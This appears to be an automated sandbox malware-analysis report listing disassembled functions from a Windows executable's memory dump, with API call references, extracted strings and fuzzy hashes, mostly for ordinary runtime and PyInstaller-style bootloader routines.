                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message
                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                  • API String ID: 2030045667-3659356012
                                                                                                                                  • Opcode ID: 5f0c9df4f84f8c722989105d0e9a125133dd12cd76a780961bdfc3608daa6951
                                                                                                                                  • Instruction ID: c376d5a98c25818f0c4d9a857310ea41271f3536b519dc1646289be5e054ba0b
                                                                                                                                  • Opcode Fuzzy Hash: 5f0c9df4f84f8c722989105d0e9a125133dd12cd76a780961bdfc3608daa6951
                                                                                                                                  • Instruction Fuzzy Hash: 30415C21A0A65292EA24BB12AC446B7E2D1FF95BC4FE44033DD5D07B95EF7CE6058B20
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message
                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                  • API String ID: 2030045667-3659356012
                                                                                                                                  • Opcode ID: 528659478858decb5e64cd19a141a6b50ba849eb96a436151a74e04084abcbf7
                                                                                                                                  • Instruction ID: d0479b3f98b89cfb0542edffdf71bb472111cd3421d52b246a400da2dcda39b7
                                                                                                                                  • Opcode Fuzzy Hash: 528659478858decb5e64cd19a141a6b50ba849eb96a436151a74e04084abcbf7
                                                                                                                                  • Instruction Fuzzy Hash: 47414021A0965381EA20AB16AC406B7E3D0EF887D4FE44033DE5E07A95EF7CE6418F10
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                  • Instruction ID: 721c043ae0fcd1463f28498fc5f47cd40c6f4f400315e4657fb9c26fbf8e505a
                                                                                                                                  • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                  • Instruction Fuzzy Hash: 56D18632A09B4186EB10AB65DD413AEB7E0FF95788FA00136DE8D57795EF38E640CB50
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF72629D29A,?,?,?,00007FF72629CF8C,?,?,?,00007FF72629CB89), ref: 00007FF72629D06D
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72629D29A,?,?,?,00007FF72629CF8C,?,?,?,00007FF72629CB89), ref: 00007FF72629D07B
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF72629D29A,?,?,?,00007FF72629CF8C,?,?,?,00007FF72629CB89), ref: 00007FF72629D0A5
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF72629D29A,?,?,?,00007FF72629CF8C,?,?,?,00007FF72629CB89), ref: 00007FF72629D113
                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF72629D29A,?,?,?,00007FF72629CF8C,?,?,?,00007FF72629CB89), ref: 00007FF72629D11F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                  • String ID: api-ms-
                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                  • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                  • Instruction ID: 1a56e0a6cba88899b32f1c5e52e302854d5bacdee28a809555c751087e00b9e1
                                                                                                                                  • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                  • Instruction Fuzzy Hash: 36316021A1BA4285EF11AB16AC00676A3D4FF89B64FA90937DD1D07380FF3CF5469A20
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                  • Opcode ID: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                                                                                  • Instruction ID: c13aeffdd4c07ce098c29d26b9b101840b771b65e2175108ff10a000c557535e
                                                                                                                                  • Opcode Fuzzy Hash: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                                                                                  • Instruction Fuzzy Hash: 3A213020E0864241FA55B3265E4617FE2C2DF487B0F944637E9BE06AD6DFACEC015F61
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                  • String ID: CONOUT$
                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                  • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                  • Instruction ID: bd8d70a758c98efb815c25a68eab09f94bfc59efba413a099c0a9e0d08d3ad8b
                                                                                                                                  • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                  • Instruction Fuzzy Hash: B311D321B28A4186E750AB02EC5432AF6E4FB8CBE4F844236EA5D83794DF3CD500CB50
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF7262939F2), ref: 00007FF72629821D
                                                                                                                                  • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF7262939F2), ref: 00007FF72629827A
                                                                                                                                    • Part of subcall function 00007FF7262986B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF726293FA4,00000000,00007FF726291925), ref: 00007FF7262986E9
                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7262939F2), ref: 00007FF726298305
                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7262939F2), ref: 00007FF726298364
                                                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,00007FF7262939F2), ref: 00007FF726298375
                                                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,00007FF7262939F2), ref: 00007FF72629838A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3462794448-0
                                                                                                                                  • Opcode ID: 639de59220823cace7c77af6f37b7d772b01f3b75ea0781fa3cc2fa807537d27
                                                                                                                                  • Instruction ID: 32474210d9c6fb33bf491c72640d3383a0559b143f1e53250ed50d0d174f0f75
                                                                                                                                  • Opcode Fuzzy Hash: 639de59220823cace7c77af6f37b7d772b01f3b75ea0781fa3cc2fa807537d27
                                                                                                                                  • Instruction Fuzzy Hash: 89418362A1A68281EA70AB21AC402FBA3D4FF84B81F984536DF5D57785EF3CD601CB14
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF7262A43FD,?,?,?,?,00007FF7262A979A,?,?,?,?,00007FF7262A649F), ref: 00007FF7262AA5E7
                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7262A43FD,?,?,?,?,00007FF7262A979A,?,?,?,?,00007FF7262A649F), ref: 00007FF7262AA61D
                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7262A43FD,?,?,?,?,00007FF7262A979A,?,?,?,?,00007FF7262A649F), ref: 00007FF7262AA64A
                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7262A43FD,?,?,?,?,00007FF7262A979A,?,?,?,?,00007FF7262A649F), ref: 00007FF7262AA65B
                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7262A43FD,?,?,?,?,00007FF7262A979A,?,?,?,?,00007FF7262A649F), ref: 00007FF7262AA66C
                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF7262A43FD,?,?,?,?,00007FF7262A979A,?,?,?,?,00007FF7262A649F), ref: 00007FF7262AA687
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                  • Opcode ID: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                                                                  • Instruction ID: fe77621146c89698d99af96b15ce7072e05013517e824208080432d6fa7f44a3
                                                                                                                                  • Opcode Fuzzy Hash: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                                                                  • Instruction Fuzzy Hash: DE111D20E0864342F955B72A5E4117AE1C2DF48BB0F844636D9AE067D6DFACEC014F61
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                  • String ID: Unhandled exception in script
                                                                                                                                  • API String ID: 3081866767-2699770090
                                                                                                                                  • Opcode ID: 2f02a126994589ece2bf0b221661227d336c2ada993d2ff489732679099e34b6
                                                                                                                                  • Instruction ID: 64e67a394c30061253714920572b21360123607404b5c79b007d3d13068b1a7b
                                                                                                                                  • Opcode Fuzzy Hash: 2f02a126994589ece2bf0b221661227d336c2ada993d2ff489732679099e34b6
                                                                                                                                  • Instruction Fuzzy Hash: 7A31733261968289EB20EF61EC552FAB3A0FF89794F940136EA4D4BB55DF3CD100CB10
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                  • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                  • API String ID: 1878133881-640379615
                                                                                                                                  • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                  • Instruction ID: de39deb2522205f1cabaf5e9c7cc1ba7fc02b2984eb0fdb8ca3789f2dd1fa5d5
                                                                                                                                  • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                  • Instruction Fuzzy Hash: 2C21627262968691E620EB10FC517EBA3A4FF84784F900137EA8D03A99DF7CD645CF50
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                  • Instruction ID: d6db11f58dc34e14bf3c0e661993f099f8441421577de4ef63e5a0342e4f25ad
                                                                                                                                  • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                  • Instruction Fuzzy Hash: 19F06861619B0281EA106B24EC4437B93A0EF89B61FD40637D96D461F4CF2CD845CB60
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _set_statfp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                  • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                  • Instruction ID: 8188f884c77acae196e4eb23451c0d599a5b5296a3ede2db0f8841ed57e6f7c9
                                                                                                                                  • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                  • Instruction Fuzzy Hash: D7114F36E68A0741F6543128DC5637B91C0EF5C368F954637EA6E0A6DACF6CA8819930
                                                                                                                                  APIs
                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF7262A98B3,?,?,00000000,00007FF7262A9B4E,?,?,?,?,?,00007FF7262A9ADA), ref: 00007FF7262AA6BF
                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7262A98B3,?,?,00000000,00007FF7262A9B4E,?,?,?,?,?,00007FF7262A9ADA), ref: 00007FF7262AA6DE
                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7262A98B3,?,?,00000000,00007FF7262A9B4E,?,?,?,?,?,00007FF7262A9ADA), ref: 00007FF7262AA706
                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7262A98B3,?,?,00000000,00007FF7262A9B4E,?,?,?,?,?,00007FF7262A9ADA), ref: 00007FF7262AA717
                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7262A98B3,?,?,00000000,00007FF7262A9B4E,?,?,?,?,?,00007FF7262A9ADA), ref: 00007FF7262AA728
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                  • Opcode ID: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                                                                  • Instruction ID: d28dbcbae46fe5ad7f6ac0a336f5241754199bdd3b2c12be868fcb6d9e3f4b9e
                                                                                                                                  • Opcode Fuzzy Hash: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                                                                  • Instruction Fuzzy Hash: 9C113020E0864242FA55B3269D4117FE1D1DF587B0F844336D8BD0A6EADFACED024F61
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                  • Opcode ID: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                                                                  • Instruction ID: 8a28284aa2b550144672548ce391ded6b15efb215aa89f131fef5e320035b6ea
                                                                                                                                  • Opcode Fuzzy Hash: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                                                                  • Instruction Fuzzy Hash: EE11F820E0824741F959B3264C521BBA2C2CF49370F944736D9BE0A2D2EFACFC015A65
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                  • String ID: verbose
                                                                                                                                  • API String ID: 3215553584-579935070
                                                                                                                                  • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                  • Instruction ID: c2a42502fd5c787f47d26858c1447bf93b8fafde8bd8cbd575031227daa21e8a
                                                                                                                                  • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                  • Instruction Fuzzy Hash: 1291BE22A08A4681E721AE25DC503BFB3D9EB40B74FC84137DA99563D5DFBCEC158B20
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo
